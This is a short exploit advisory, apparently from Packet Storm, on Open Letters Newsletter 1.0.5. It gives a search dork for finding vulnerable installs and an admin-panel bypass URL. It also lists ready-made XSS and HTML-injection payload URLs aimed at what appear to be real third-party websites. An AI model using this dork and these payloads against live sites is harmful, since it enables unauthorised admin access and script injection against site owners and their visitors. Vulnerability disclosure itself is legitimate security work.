Open Letters Newsletter 1.0.5 XSS / Administrative Bypass

🗓️ 04 Jun 2015 00:00:00Reported by indoushkaType

packetstorm🔗 packetstormsecurity.com👁 18 Views

Open Letters Newsletter system v1.0.5 vulnerability report. Bypass admin panel and XSS issues foun

`| # Title : Open Letters Newsletter system v1.0.5 Mulllti Vulnerability  
| # Author : indoushka  
| # email : [email protected]  
| # Dork : intext:© 2015 Example.com - Impressum  
| # Tested on: Win8.1 fr pro / 12:11 * 15/05/2015  
| # Bug : Mulllti  
| # Download : http://www.open-letters.de/?file=tl_files/open_letters/grafik/newslettersystem/2014-10-27_Open-Letters_Newslettersystem_v1.0.5.zip  
=======================================  
By Pass Admin Panel :  
  
http://www.top-markt.net/newsletter/admin/  
  
Cross site scripting :  
  
https://www.tegernsee-solar.de/nl/index.php/%22onmouseover%3d'prompt%28988047%29'bad%3d%22%3E  
  
( XSS / HTML Inject ) :  
  
https://www.tegernsee-solar.de/nl/index.php/%22%3Cmarquee%3E%3Cfont%20color=Blue%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E%22%3E  
  
`

04 Jun 2015 00:00Current

0.2Low risk

Vulners AI Score0.2